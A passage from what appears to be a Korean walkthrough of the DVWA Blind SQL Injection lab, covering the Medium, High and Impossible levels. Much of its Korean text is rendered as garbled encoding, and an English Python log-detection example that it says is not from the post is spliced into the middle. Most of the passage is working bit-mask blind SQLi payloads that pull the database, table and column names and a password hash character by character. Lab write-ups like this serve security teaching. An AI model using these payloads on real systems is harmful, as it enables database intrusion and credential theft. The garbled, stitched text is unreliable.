5f4dcc3b5aa765d61d8327deb882cf99

์œ„์™€ ๊ฐ™์ด Blind SQL Injection์„ ํ†ตํ•ด ๊ฐ’์„ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ๋‹ค.


Security Level: Medium

Medium ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์œ„์™€ ๊ฐ™์ด mysqli_real_escape_string ์„ ์ด์šฉํ•˜๊ณ  ์žˆ์–ด์„œ ' ๊ฐ€ ๋จนํžˆ์ง€ ์•Š๋Š”๋‹ค. ๊ทธ๋ž˜์„œ LIMIT์„ ์ด์šฉํ•˜์—ฌ ๋ฐ์ดํ„ฐ๋ฅผ ์ฐพ์•„์ค„ ๊ฒƒ์ด๋‹ค. ํ•ด๋‹น ๋ ˆ๋ฒจ์—์„œ๋Š” DB ์ด๋ฆ„, TABLE ์ด๋ฆ„, COLUMN์ด๋ฆ„, DATA ์˜ ๊ฐ ์ฒซ๊ธ€์ž๋งŒ ํ™•์ธํ•˜๋Š” ์‹์œผ๋กœ ๋„˜๊ธธ ๊ฒƒ์ด๋‹ค.(๊ฐ€๋Šฅํ•œ์ง€์˜ ์—ฌ๋ถ€๋งŒ ํ™•์ธํ•œ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค.)

์šฐ์„  ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True/False

At the Medium level there is no direct input field, so the input is supplied by tampering with the parameter.

True value: 1 and 1=1

False value: 1 and 1=2

 

Attack query

First write the attack query, then insert the desired SQL statement in the place where the SQL goes.

At the Medium level, as confirmed above, mysqli_real_escape_string is used, so ' is not recognised. Therefore LIMIT is used in addition.

"One set" for determining the value of a single character
1+and+ascii(substr((select+__SQL__),1,1))%261=1
1+and+ascii(substr((select+__SQL__),1,1))%262=2
1+and+ascii(substr((select+__SQL__),1,1))%264=4
1+and+ascii(substr((select+__SQL__),1,1))%268=8
1+and+ascii(substr((select+__SQL__),1,1))%2616=16
1+and+ascii(substr((select+__SQL__),1,1))%2632=32
1+and+ascii(substr((select+__SQL__),1,1))%2664=64
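Seen from the server side, "one set" is seven near-identical requests from one source whose only difference is the mask, and that shape is easy to pick out of an access log. The following is an added example (not from the post): a small detector over constructed log lines that carry the URL-encoded payloads above (%26 for &, and %27 / %23 for ' and # in the Low/High form). The log format, the IPs, the `id` parameter name and the threshold of seven probes are assumptions for the demonstration.

```python
# Added example, not code from the post: flag bit-mask blind SQLi probing in an access log.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not real traffic), combined-log style.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2024:23:01:01 +0900] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:02 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%261=1&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:02 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%262=2&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:03 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%264=4&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:03 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%268=8&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:04 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%2616=16&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:04 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%2632=32&Submit=Submit HTTP/1.1" 200 4321
10.0.0.9 - - [12/Apr/2024:23:01:05 +0900] "GET /vulnerabilities/sqli_blind/?id=1+and+ascii(substr((select+database()),1,1))%2664=64&Submit=Submit HTTP/1.1" 200 4321
10.0.0.7 - - [12/Apr/2024:23:02:10 +0900] "GET /vulnerabilities/sqli_blind/?id=1%27+and+ascii(substr((select+database()),1,1))%261%3D1%23&Submit=Submit HTTP/1.1" 200 4321
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PROBE_RE = re.compile(r"ascii\s*\(\s*substr\s*\(", re.IGNORECASE)   # the probe's fixed skeleton
MASK_RE = re.compile(r"&\s*(\d+)\s*=\s*\1\b")                        # "&mask=mask" after decoding


def parse_probe(line):
    """Return (ip, decoded id value, mask) for a probe line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qs splits on the literal '&' separators first, then decodes %26 / %27 / %23
    # inside the value, so the payload's own '&' does not break the parameter apart.
    id_value = parse_qs(query).get("id", [""])[0]
    if not PROBE_RE.search(id_value):
        return None
    mask = MASK_RE.search(id_value)
    return (m.group("ip"), id_value, int(mask.group(1)) if mask else None)


def find_probes(log_text):
    return [p for p in (parse_probe(line) for line in log_text.splitlines()) if p]


def flag_sources(log_text, threshold=7):
    """Sources that sent at least one full 'set' (seven probes) get flagged."""
    per_ip = defaultdict(int)
    for ip, _, _ in find_probes(log_text):
        per_ip[ip] += 1
    return {ip: n for ip, n in per_ip.items() if n >= threshold}


if __name__ == "__main__":
    for ip, value, mask in find_probes(SAMPLE_LOG):
        print(ip, mask, value)
    print(flag_sources(SAMPLE_LOG))
```

The substring match on `ascii(substr(` is deliberately narrow so the example stays readable; in practice the per-source rate of requests that differ only in a numeric mask is the more robust signal, since the skeleton can be rewritten (ord(), mid(), comment padding) while the seven-probes-per-character rhythm cannot.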

 

DB์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB ์ด๋ฆ„์ด dvwa๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ d๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+database()),1,1))%261=1
1+and+ascii(substr((select+database()),1,1))%262=2
1+and+ascii(substr((select+database()),1,1))%264=4
1+and+ascii(substr((select+database()),1,1))%268=8
1+and+ascii(substr((select+database()),1,1))%2616=16
1+and+ascii(substr((select+database()),1,1))%2632=32
1+and+ascii(substr((select+database()),1,1))%2664=64
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select table_name from information_schema.tables limit 1,1

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์ด 2๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , users ๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ u๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%261=1 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%262=2 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%264=4 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%268=8 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2616=16 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2632=32 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2664=64
1, 4, 16, 32, 64 -> 117 -> u

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 117์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ u๊ฐ€ ๋œ๋‹ค.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select column_name from information_schema.columns limit 7,1

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์ด 8๋ฒˆ์งธ์— ์กด์žฌํ•˜๊ณ , password๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ p๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค. (8๋ฒˆ์งธ ์ธ ์ด์œ ๋Š” ' ๊ฐ€ ๋จนํžˆ์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— guestbook ํ…Œ์ด๋ธ”์˜ ์ปฌ๋Ÿผ๋„ ์ถœ๋ ฅ๋˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ•ด๋‹น ์ปฌ๋Ÿผ์ด ์ด 3๊ฐœ์ด๊ณ , users ํ…Œ์ด๋ธ”์—์„œ password ์ปฌ๋Ÿผ์ด 5๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค.)

1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%261=1 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%262=2 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%264=4 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%268=8 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2616=16 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2632=32 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2664=64
16, 32, 64 -> 112 -> p

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 112์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ p๊ฐ€ ๋œ๋‹ค.

 

DATA ํ™•์ธํ•˜๊ธฐ

select password from users limit 0,1

ํ™•์ธํ•ด ๋ณผ ๋ฐ์ดํ„ฐ๊ฐ€ password ์ปฌ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ์ด๊ณ , ํ•ด๋‹น ๊ฐ’์ด 5f4dcc3b5aa765d61d8327deb882cf99์ž„์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ 5๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%261=1 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%262=2 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%264=4 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%268=8 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2616=16 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2632=32 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2664=64
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.


Security Level: High

High ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ์„ ์œ„ํ•œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ ์ด์™ธ์— ๋ฐฉ์‹์€ Low ๋ ˆ๋ฒจ๊ณผ ๊ฑฐ์˜ ๋™์ผํ•˜๋‹ค๊ณ  ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

ํ•ด๋‹น ๋ ˆ๋ฒจ์—์„œ๋„ DB ์ด๋ฆ„, TABLE ์ด๋ฆ„, COLUMN์ด๋ฆ„, DATA ์˜ ๊ฐ ์ฒซ๊ธ€์ž๋งŒ ํ™•์ธํ•˜๋Š” ์‹์œผ๋กœ ๋„˜๊ธธ ๊ฒƒ์ด๋‹ค. (๊ฐ€๋Šฅํ•œ์ง€์˜ ์—ฌ๋ถ€๋งŒ ํ™•์ธํ•œ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค.)

์šฐ์„  ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True/False

์–ด๋–ค ์ž…๋ ฅ์„ ํ•˜๋“ , ์ž…๋ ฅ์šฉ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—๋Š” Cookie ID set! ์ด๋ผ๋Š” ๋™์ผํ•œ ๋ฉ”์‹œ์ง€๋งŒ ์ถœ๋ ฅ๋œ๋‹ค. ํ•˜์ง€๋งŒ ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด ํ•ด๋‹น ์ž…๋ ฅ์ด ๋“ค์–ด๊ฐ€๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

์ฐธ(True)์ธ ๊ฐ’: 1' and 1=1 #

๊ฑฐ์ง“(False)์ธ ๊ฐ’: 1' and 1=2 #

 

DB์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB ์ด๋ฆ„์ด dvwa๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ d๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select database()),1,1))&1=1#
1' and ascii(substr((select database()),1,1))&2=2#
1' and ascii(substr((select database()),1,1))&4=4#
1' and ascii(substr((select database()),1,1))&8=8#
1' and ascii(substr((select database()),1,1))&16=16#
1' and ascii(substr((select database()),1,1))&32=32#
1' and ascii(substr((select database()),1,1))&64=64#
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์ด 2๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , users ๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ u๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64#
1, 4, 16, 32, 64 -> 117 -> u

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 117์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ u๊ฐ€ ๋œ๋‹ค.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select column_name from information_schema.columns where table_name = 'users' limit 4,1

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์ด users ํ…Œ์ด๋ธ”์˜ 5๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , password๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ p๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค. 

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64#
16, 32, 64 -> 112 -> p

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 112์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ p๊ฐ€ ๋œ๋‹ค.

 

DATA ํ™•์ธํ•˜๊ธฐ

select password from users limit 0,1

ํ™•์ธํ•ด ๋ณผ ๋ฐ์ดํ„ฐ๊ฐ€ password ์ปฌ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ์ด๊ณ , ํ•ด๋‹น ๊ฐ’์ด 5f4dcc3b5aa765d61d8327deb882cf99์ž„์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ 5๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.


Security Level: Impossible

Impossible ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•˜์—ฌ ์ˆซ์ž๋งŒ ์ž…๋ ฅ ๊ฐ€๋Šฅํ•˜๋„๋ก ํ–ˆ๊ธฐ ๋•Œ๋ฌธ์—, SQL Injection์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค.


Questions are welcome, as are corrections and suggestions for improvement.